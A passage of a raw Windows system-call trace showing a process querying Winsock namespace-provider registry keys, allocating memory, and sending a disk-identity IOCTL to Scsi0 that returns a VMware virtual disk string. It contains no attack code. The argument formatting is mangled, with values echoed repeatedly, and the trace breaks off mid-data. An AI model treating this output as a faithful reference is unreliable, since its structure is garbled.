 00695   748   NtQueryValueKey  (88,  (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0
 00696   748   NtQueryValueKey  (88,  (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0w\0i\0n\0r\0n\0r\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0
 00697   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0
 00698   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0
 00699   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0
 00700   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0T\0D\0S\0\0\0"}, 22, ) }, 22, ) == 0x0
 00701   748   NtQueryValueKey  (88,  (88, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\3567&;\200\345\317\21\245U\0\300O\330\324\254"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (88, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\3567&;\200\345\317\21\245U\0\300O\330\324\254"}, 28, ) }, 28, ) == 0x0
 00702   748   NtQueryValueKey  (88,  (88, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00703   748   NtQueryValueKey  (88,  (88, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data=" \0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data=" \0\0\0"}, 16, ) }, 16, ) == 0x0
 00704   748   NtQueryValueKey  (88,  (88, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 00705   748   NtQueryValueKey  (88,  (88, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00706   748   NtQueryValueKey  (88,  (88, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00707   748   NtClose  (88, ... ) == 0x0
 00708   748   NtAllocateVirtualMemory  (-1, 1363968, 0, 4096, 4096, 4, ... 1363968, 4096, ) == 0x0
 00709   748   NtOpenKey  (0x20019, {24, 84, 0x40, 0, 0,  (0x20019, {24, 84, 0x40, 0, 0, "000000000003"}, ... 88, ) }, ... 88, ) == 0x0
 00710   748   NtQueryValueKey  (88,  (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0
 00711   748   NtQueryValueKey  (88,  (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0S\0y\0s\0t\0e\0m\03\02\0\\0m\0s\0w\0s\0o\0c\0k\0.\0d\0l\0l\0\0\0"}, 80, ) }, 80, ) == 0x0
 00712   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0
 00713   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0
 00714   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0
 00715   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="N\0e\0t\0w\0o\0r\0k\0 \0L\0o\0c\0a\0t\0i\0o\0n\0 \0A\0w\0a\0r\0e\0n\0e\0s\0s\0 \0(\0N\0L\0A\0)\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 98, ) }, 98, ) == 0x0
 00716   748   NtQueryValueKey  (88,  (88, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data=":$Bf\250;\246J\272\245.\13\327\37\335\203"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (88, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data=":$Bf\250;\246J\272\245.\13\327\37\335\203"}, 28, ) }, 28, ) == 0x0
 00717   748   NtQueryValueKey  (88,  (88, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00718   748   NtQueryValueKey  (88,  (88, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\17\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\17\0\0\0"}, 16, ) }, 16, ) == 0x0
 00719   748   NtQueryValueKey  (88,  (88, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 00720   748   NtQueryValueKey  (88,  (88, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00721   748   NtQueryValueKey  (88,  (88, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00722   748   NtClose  (88, ... ) == 0x0
 00723   748   NtOpenKey  (0x20019, {24, 84, 0x40, 0, 0,  (0x20019, {24, 84, 0x40, 0, 0, "000000000004"}, ... 88, ) }, ... 88, ) == 0x0
 00724   748   NtQueryValueKey  (88,  (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0b\0t\0h\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0b\0t\0h\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0
 00725   748   NtQueryValueKey  (88,  (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0b\0t\0h\0.\0d\0l\0l\0\0\0"}, 78, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "LibraryPath", Partial, 144, ... TitleIdx=0, Type=1, Data="%\0S\0y\0s\0t\0e\0m\0R\0o\0o\0t\0%\0\\0s\0y\0s\0t\0e\0m\03\02\0\\0w\0s\0h\0b\0t\0h\0.\0d\0l\0l\0\0\0"}, 78, ) }, 78, ) == 0x0
 00726   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) }, 52, ) == 0x0
 00727   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) }, 52, ) == 0x0
 00728   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) }, 52, ) == 0x0
 00729   748   NtQueryValueKey  (88,  (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (88, "DisplayString", Partial, 144, ... TitleIdx=0, Type=1, Data="B\0l\0u\0e\0t\0o\0o\0t\0h\0 \0N\0a\0m\0e\0s\0p\0a\0c\0e\0\0\0"}, 52, ) }, 52, ) == 0x0
 00730   748   NtQueryValueKey  (88,  (88, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\340c\252\6`}\377A\257\262>\346\322\3319-"}, 28, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (88, "ProviderId", Partial, 144, ... TitleIdx=0, Type=3, Data="\340c\252\6`}\377A\257\262>\346\322\3319-"}, 28, ) }, 28, ) == 0x0
 00731   748   NtQueryValueKey  (88,  (88, "AddressFamily", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00732   748   NtQueryValueKey  (88,  (88, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\20\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "SupportedNameSpace", Partial, 144, ... TitleIdx=0, Type=4, Data="\20\0\0\0"}, 16, ) }, 16, ) == 0x0
 00733   748   NtQueryValueKey  (88,  (88, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "Enabled", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0
 00734   748   NtQueryValueKey  (88,  (88, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "Version", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00735   748   NtQueryValueKey  (88,  (88, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (88, "StoresServiceClassInfo", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 00736   748   NtClose  (88, ... ) == 0x0
 00737   748   NtClose  (84, ... ) == 0x0
 00738   748   NtWaitForSingleObject  (76, 0, {0, 0}, ... ) == 0x102
 00739   748   NtClose  (64, ... ) == 0x0
 00740   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00741   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00742   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "System\CurrentControlSet\Services\Winsock2\Parameters"}, ... 64, ) }, ... 64, ) == 0x0
 00743   748   NtQueryValueKey  (64,  (64, "Ws2_32NumHandleBuckets", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00744   748   NtClose  (64, ... ) == 0x0
 00745   748   NtDuplicateObject  (-1, -2, -1, 0x0, 0, 2, ... 64, ) == 0x0
 00746   748   NtAllocateVirtualMemory  (-1, 9912320, 0, 16384, 4096, 4, ... 9912320, 16384, ) == 0x0
 00747   748   NtAllocateVirtualMemory  (-1, 0, 0, 17, 4096, 64, ... 3538944, 4096, ) == 0x0
 00748   748   NtAllocateVirtualMemory  (-1, 0, 0, 26, 4096, 64, ... 3604480, 4096, ) == 0x0
 00749   748   NtAllocateVirtualMemory  (-1, 0, 0, 273, 4096, 64, ... 3670016, 4096, ) == 0x0
 00750   748   NtAllocateVirtualMemory  (-1, 9928704, 0, 16384, 4096, 4, ... 9928704, 16384, ) == 0x0
 00751   748   NtFreeVirtualMemory  (-1, (0x978000), 16384, 16384, ... (0x978000), 16384, ) == 0x0
 00752   748   NtAllocateVirtualMemory  (-1, 9928704, 0, 16384, 4096, 4, ... 9928704, 16384, ) == 0x0
 00753   748   NtFreeVirtualMemory  (-1, (0x978000), 16384, 16384, ... (0x978000), 16384, ) == 0x0
 00754   748   NtFreeVirtualMemory  (-1, (0x974000), 16384, 16384, ... (0x974000), 16384, ) == 0x0
 00755   748   NtAllocateVirtualMemory  (-1, 9912320, 0, 16384, 4096, 4, ... 9912320, 16384, ) == 0x0
 00756   748   NtFreeVirtualMemory  (-1, (0x974000), 16384, 16384, ... (0x974000), 16384, ) == 0x0
 00757   748   NtAllocateVirtualMemory  (-1, 9912320, 0, 131072, 4096, 4, ... 9912320, 131072, ) == 0x0
 00758   748   NtAllocateVirtualMemory  (-1, 10043392, 0, 16384, 4096, 4, ... 10043392, 16384, ) == 0x0
 00759   748   NtFreeVirtualMemory  (-1, (0x994000), 16384, 16384, ... (0x994000), 16384, ) == 0x0
 00760   748   NtFreeVirtualMemory  (-1, (0x974000), 131072, 16384, ... (0x974000), 131072, ) == 0x0
 00761   748   NtAllocateVirtualMemory  (-1, 9912320, 0, 16384, 4096, 4, ... 9912320, 16384, ) == 0x0
 00762   748   NtFreeVirtualMemory  (-1, (0x974000), 16384, 16384, ... (0x974000), 16384, ) == 0x0
 00763   748   NtAllocateVirtualMemory  (-1, 9912320, 0, 98304, 4096, 4, ... 9912320, 98304, ) == 0x0
 00764   748   NtFreeVirtualMemory  (-1, (0x974000), 98304, 16384, ... (0x974000), 98304, ) == 0x0
 00765   748   NtAllocateVirtualMemory  (-1, 9912320, 0, 16384, 4096, 4, ... 9912320, 16384, ) == 0x0
 00766   748   NtFreeVirtualMemory  (-1, (0x974000), 16384, 16384, ... (0x974000), 16384, ) == 0x0
 00767   748   NtAllocateVirtualMemory  (-1, 9912320, 0, 16384, 4096, 4, ... 9912320, 16384, ) == 0x0
 00768   748   NtAllocateVirtualMemory  (-1, 0, 0, 10821, 4096, 64, ... 3932160, 12288, ) == 0x0
 00769   748   NtAllocateVirtualMemory  (-1, 0, 0, 768, 4096, 64, ... 3997696, 4096, ) == 0x0
 00770   748   NtAllocateVirtualMemory  (-1, 0, 0, 768, 4096, 64, ... 4063232, 4096, ) == 0x0
 00771   748   NtAllocateVirtualMemory  (-1, 0, 0, 768, 4096, 64, ... 4128768, 4096, ) == 0x0
 00772   748   NtAllocateVirtualMemory  (-1, 0, 0, 768, 4096, 64, ... 11272192, 4096, ) == 0x0
 00773   748   NtAllocateVirtualMemory  (-1, 9928704, 0, 16384, 4096, 4, ... 9928704, 16384, ) == 0x0
 00774   748   NtAllocateVirtualMemory  (-1, 9945088, 0, 16384, 4096, 4, ... 9945088, 16384, ) == 0x0
 00775   748   NtCreateFile  (0xc0100080, {24, 0, 0x40, 0, 1243880,  (0xc0100080, {24, 0, 0x40, 0, 1243880, "\??\Scsi0:"}, 0x0, 0, 3, 1, 96, 0, 0, ... 84, {status=0x0, info=0}, ) }, 0x0, 0, 3, 1, 96, 0, 0, ... 84, {status=0x0, info=0}, ) == 0x0
 00776   748   NtDeviceIoControlFile  (84, 0, 0x0, 0x0, 0x4d008,  (84, 0, 0x0, 0x0, 0x4d008, "\34\0\0\0SCSIDISK\2\0\0\0\1\5\33\0\0\0\0\0 \2\0\0\0\2\0\0\0\1\1\0\0\240\354\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 572, 572, ... {status=0x0, info=572}, "\34\0\0\0SCSIDISK\2\0\0\0\1\5\33\0\0\0\0\0 \2\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0zB\377?\0\0\17\0\0\0\0\0?\0\0\0\0\0\0\000000000000000000010\0\0@\0\0\000000010MVawerV riutlaI EDH ra drDvi e          @\200\0\0\0/\0\0\0\2\0\0\7\0CD\17\0?\0S\373\354\0@\1\0\0\0\1\0\0\7\0\3\0x\0x\0\240\0x\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\0\27\0\10@\10@\0@\10@\0@\0@\7\4\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , 572, 572, ... {status=0x0, info=572},  (84, 0, 0x0, 0x0, 0x4d008, "\34\0\0\0SCSIDISK\2\0\0\0\1\5\33\0\0\0\0\0 \2\0\0\0\2\0\0\0\1\1\0\0\240\354\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 572, 572, ... {status=0x0, info=572}, "\34\0\0\0SCSIDISK\2\0\0\0\1\5\33\0\0\0\0\0 \2\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0zB\377?\0\0\17\0\0\0\0\0?\0\0\0\0\0\0\000000000000000000010\0\0@\0\0\000000010MVawerV riutlaI EDH ra drDvi e          @\200\0\0\0/\0\0\0\2\0\0\7\0CD\17\0?\0S\373\354\0@\1\0\0\0\1\0\0\7\0\3\0x\0x\0\240\0x\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\0\27\0\10@\10@\0@\10@\0@\0@\7\4\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\